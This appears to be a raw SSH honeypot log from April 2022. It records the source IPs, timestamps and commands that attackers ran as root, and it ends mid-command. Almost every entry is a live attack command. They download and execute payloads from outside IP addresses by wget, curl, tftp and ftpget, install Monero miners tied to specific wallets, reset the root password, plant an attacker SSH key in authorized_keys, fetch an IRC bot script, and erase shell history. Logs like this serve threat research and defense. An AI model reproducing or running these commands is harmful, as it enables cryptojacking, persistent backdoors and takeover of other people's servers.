ssh2 root Exec /ip cloud print /ip cloud print Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 8.225.226.100 11-Apr-2022 03:48:58 ssh2 root Exec uname -a;wget -4 http://147.182.218.113/.x/test;curl -O http://147.182.218.113/.x/test;dget -4 http://147.182.218.113/.x/test;tar -xzf test;rm -f test;cd ./-s;rpm -Uvh shc.rpm;./.s;sleep 50;rm -rf ./-s;rm -rf /dev/shm/c3pool /root/c3pool;pkill -f xmrig;rm -rf ~/.bash_history;history -cw uname -a wget -4 http://147.182.218.113/.x/test curl -O http://147.182.218.113/.x/test dget -4 http://147.182.218.113/.x/test tar -xzf test rm -f test cd ./-s rpm -Uvh shc.rpm ./.s sleep 50 rm -rf ./-s rm -rf /dev/shm/c3pool /root/c3pool pkill -f xmrig rm -rf ~/.bash_history history -cw From 42.97.47.17 11-Apr-2022 07:14:47 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr From 159.65.113.87 11-Apr-2022 23:15:07 ssh2 root Exec cd /tmp ; wget http://208.115.245.158/c --no-check-certificate; curl -O http://208.115.245.158/c ; chmod 777 c* ; ./c ; rm -rf -c* ; history -c cd /tmp wget http://208.115.245.158/c --no-check-certificate curl -O http://208.115.245.158/c chmod 777 c* ./c rm -rf -c* history -c From 130.162.183.218 12-Apr-2022 05:32:15 ssh2 root Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +x * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.161.105/systemd wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 86.125.92.76 12-Apr-2022 14:12:53 ssh2 root cd /tmp wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar tar xvf miner.tar cd miner ls ls exit From 179.43.154.138 12-Apr-2022 19:18:38 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash From 163.123.142.166 12-Apr-2022 23:27:15 ssh2 root Exec wget 194.31.98.248/x86_64; chmod 777 x86_64; ./x86_64 wns.x86 wget 194.31.98.248/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 From 122.155.187.139 13-Apr-2022 03:58:18 ssh2 root Exec uname -a; cd /tmp ; export HOME=/usr/lib ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN ; export HOME=/root uname -a cd /tmp export HOME=/usr/lib curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN export HOME=/root From 103.9.36.251 13-Apr-2022 11:26:16 ssh2 root Exec uname -a ; lscpu uname -a lscpu Exec uname -a ; lscpu uname -a lscpu Exec uname -a ; lscpu uname -a lscpu From 163.123.142.166 14-Apr-2022 11:27:48 ssh2 root Exec wget 23.94.22.13/x86_64; chmod 777 x86_64; ./x86_64 wns.x86 wget 23.94.22.13/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 From 86.125.92.76 14-Apr-2022 15:22:42 ssh2 root lscpu cd /tmp wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar tar xvf miner.tar cd miner ls From 179.43.154.137 15-Apr-2022 00:41:26 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA lspci | grep -i --color 'vga\|3d\|2d' echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash From 164.92.220.20 15-Apr-2022 04:50:15 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r .sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.160.54/onion002 curl -O http://45.90.160.54/onion002 chmod 777 onion002 sh onion002 tftp 45.90.160.54 -c get onion002.sh chmod 777 onion002.sh sh onion002.sh tftp -r .sh -g 45.90.160.54 chmod 777 onion002 sh onion002 ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * Exec /ip cloud print /ip cloud print From 193.105.134.95 15-Apr-2022 13:40:23 ssh2 root lscpu cd /tmp wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar tar xvf miner.tar cd miner ls From 179.43.154.138 15-Apr-2022 19:29:30 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash From 164.92.183.246 16-Apr-2022 00:36:02 ssh2 root Exec cd /tmp ; wget 164.92.142.65/irc.pl ; perl irc.pl ; rm -rf irc.pl ; curl -O 164.92.142.65/irc.pl ; perl irc.pl ; rm -rf irc.pl ; history -c cd /tmp wget 164.92.142.65/irc.pl perl irc.pl rm -rf irc.pl curl -O 164.92.142.65/irc.pl perl irc.pl rm -rf irc.pl history -c From 130.162.183.218 16-Apr-2022 20:19:42 ssh2 root Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +x * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.161.105/systemd wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 64.31.47.250 16-Apr-2022 22:20:47 ssh2 root Exec cd /tmp; rm -rf wget*; curl -O http://45.95.55.24/wget.sh; wget http://45.95.55.24/wget.sh; chmod 777 wget.sh; ./wget.sh cd /tmp rm -rf wget* curl -O http://45.95.55.24/wget.sh wget http://45.95.55.24/wget.sh chmod 777 wget.sh ./wget.sh From 64.31.47.254 16-Apr-2022 22:25:41 ssh2 root Exec cd /tmp; rm -rf wget*; curl -O http://45.95.55.24/wget.sh; wget http://45.95.55.24/wget.sh; chmod 777 wget.sh; ./wget.sh cd /tmp rm -rf wget* curl -O http://45.95.55.24/wget.sh wget http://45.95.55.24/wget.sh chmod 777 wget.sh ./wget.sh From 179.43.154.137 17-Apr-2022 06:20:54 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA lspci | grep -i --color 'vga\|3d\|2d' echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash From 164.92.220.20 17-Apr-2022 13:00:52 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r .sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.160.54/onion002 curl -O http://45.90.160.54/onion002 chmod 777 onion002 sh onion002 tftp 45.90.160.54 -c get onion002.sh chmod 777 onion002.sh sh onion002.sh tftp -r .sh -g 45.90.160.54 chmod 777 onion002 sh onion002 ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 179.43.154.138 17-Apr-2022 13:57:43 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:d11es2@34e3123g4tij24jtiu3ji4rg|chpasswd|bash uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:d11es2@34e3123g4tij24jtiu3ji4rg|chpasswd|bash From 86.125.92.76 17-Apr-2022 19:36:52 ssh2 root top lscpui lscpu From 195.3.147.60 17-Apr-2022 19:39:29 ssh2 root cd /tmp wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar tar xvf miner.tar cd miner ls From 86.125.92.76 17-Apr-2022 20:40:42 ssh2 root top From 64.31.61.94 18-Apr-2022 01:07:39 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf * cd /tmp cd /var/run cd /mnt cd /root cd / wget http://136.144.41.55/Saitama.sh curl -O http://136.144.41.55/Saitama.sh chmod 777 Saitama.sh sh Saitama.sh tftp 136.144.41.55 -c get tSaitama.sh chmod 777 tSaitama.sh sh tSaitama.sh tftp -r tSaitama2.sh -g 136.144.41.55 chmod 777 tSaitama2.sh sh tSaitama2.sh ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh sh Saitama1.sh rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh rm -rf * From 64.31.47.206 18-Apr-2022 01:55:43 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf * cd /tmp cd /var/run cd /mnt cd /root cd / wget http://136.144.41.55/Saitama.sh curl -O http://136.144.41.55/Saitama.sh chmod 777 Saitama.sh sh Saitama.sh tftp 136.144.41.55 -c get tSaitama.sh chmod 777 tSaitama.sh sh tSaitama.sh tftp -r tSaitama2.sh -g 136.144.41.55 chmod 777 tSaitama2.sh sh tSaitama2.sh ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh sh Saitama1.sh rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh rm -rf * From 138.197.21.218 18-Apr-2022 04:08:58 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 222.255.115.237 18-Apr-2022 05:07:24 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 72.167.41.167 18-Apr-2022 05:56:53 ssh2 root Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~ rm -rf .ssh mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys chmod -R go= ~/.ssh cd ~ From 64.31.47.254 18-Apr-2022 15:47:52 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://45.95.55.24/wget.sh; curl -O http://45.95.55.24/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 45.95.55.24 -c get twget.sh; chmod 777 twget.sh; sh twget.sh; tftp -r twget2.sh -g 45.95.55.24; chmod 777 twget2.sh; sh twget2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh; sh wget1.sh; rm -rf wget.sh twget.sh twget2.sh wget1.sh; rm -rf * cd /tmp cd /var/run cd /mnt cd /root cd / wget http://45.95.55.24/wget.sh curl -O http://45.95.55.24/wget.sh chmod 777 wget.sh sh wget.sh tftp 45.95.55.24 -c get twget.sh chmod 777 twget.sh sh twget.sh tftp -r twget2.sh -g 45.95.55.24 chmod 777 twget2.sh sh twget2.sh ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh sh wget1.sh rm -rf wget.sh twget.sh twget2.sh wget1.sh rm -rf * From 64.31.61.90 18-Apr-2022 17:42:31 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://45.95.55.24/wget.sh; curl -O http://45.95.55.24/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 45.95.55.24 -c get twget.sh; chmod 777 twget.sh; sh twget.sh; tftp -r twget2.sh -g 45.95.55.24; chmod 777 twget2.sh; sh twget2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh; sh wget1.sh; rm -rf wget.sh twget.sh twget2.sh wget1.sh; rm -rf * cd /tmp cd /var/run cd /mnt cd /root cd / wget http://45.95.55.24/wget.sh curl -O http://45.95.55.24/wget.sh chmod 777 wget.sh sh wget.sh tftp 45.95.55.24 -c get twget.sh chmod 777 twget.sh sh twget.sh tftp -r twget2.sh -g 45.95.55.24 chmod 777 twget2.sh sh twget2.sh ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh sh wget1.sh rm -rf wget.sh twget.sh twget2.sh wget1.sh rm -rf * From 194.165.16.5 19-Apr-2022 00:18:47 ssh2 root Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e "xox0\nxox0" | passwd curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj echo -e "xox0\nxox0" | passwd From 164.92.220.20 19-Apr-2022 01:28:50 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r .sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.160.54/onion002 curl -O http://45.90.160.54/onion002 chmod 777 onion002 sh onion002 tftp 45.90.160.54 -c get onion002.sh chmod 777 onion002.sh sh onion002.sh tftp -r .sh -g 45.90.160.54 chmod 777 onion002 sh onion002 ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 194.165.16.5 19-Apr-2022 02:16:00 ssh2 root Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e "xox0\nxox0" | passwd curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj echo -e "xox0\nxox0" | passwd From 161.35.89.214 19-Apr-2022 11:07:35 ssh2 root Exec wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main From 64.225.69.252 20-Apr-2022 15:06:46 ssh2 root Exec wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main && rm -rf * wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main rm -rf * From 161.35.89.112 20-Apr-2022 19:07:28 ssh2 root Exec wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main From 64.225.64.101 21-Apr-2022 11:58:06 ssh2 root Exec wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main && rm -rf * wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main rm -rf * From 185.28.39.119 21-Apr-2022 23:50:26 ssh2 root Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://37.0.11.168/sh || curl -O http://37.0.11.168/sh || tftp 37.0.11.168 -c get sh; tftp -g -r sh 37.0.11.168; chmod 777 sh;./sh root; rm -rf sh; echo -e gay cd /tmp cd /dev cd /mnt cd /var rm -rf sh wget http://37.0.11.168/sh || curl -O http://37.0.11.168/sh || tftp 37.0.11.168 -c get sh tftp -g -r sh 37.0.11.168 chmod 777 sh ./sh root rm -rf sh echo -e gay From 185.28.39.119 22-Apr-2022 00:05:12 ssh2 root Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://37.0.11.168/sh || curl -O http://37.0.11.168/sh || tftp 37.0.11.168 -c get sh; tftp -g -r sh 37.0.11.168; chmod 777 sh;./sh root; rm -rf sh; echo -e gay cd /tmp cd /dev cd /mnt cd /var rm -rf sh wget http://37.0.11.168/sh || curl -O http://37.0.11.168/sh || tftp 37.0.11.168 -c get sh tftp -g -r sh 37.0.11.168 chmod 777 sh ./sh root rm -rf sh echo -e gay From 179.43.142.83 24-Apr-2022 14:44:18 ssh2 root Exec echo root:dss4tij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dss4tij24jtiu3ji4rg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 179.43.154.185 24-Apr-2022 23:58:47 ssh2 root Exec echo root:dss4tij24jtiu3ji43rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dss4tij24jtiu3ji43rg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 209.141.57.143 25-Apr-2022 00:37:06 ssh2 root Exec cd /tmp && wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar && tar xvf miner.tar && cd miner && chmod +x * && ./sshd && ./krane 123456 cd /tmp wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar tar xvf miner.tar cd miner chmod +x * ./sshd ./krane 123456 From 209.141.57.143 25-Apr-2022 01:37:04 ssh2 root Exec cd /tmp && wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 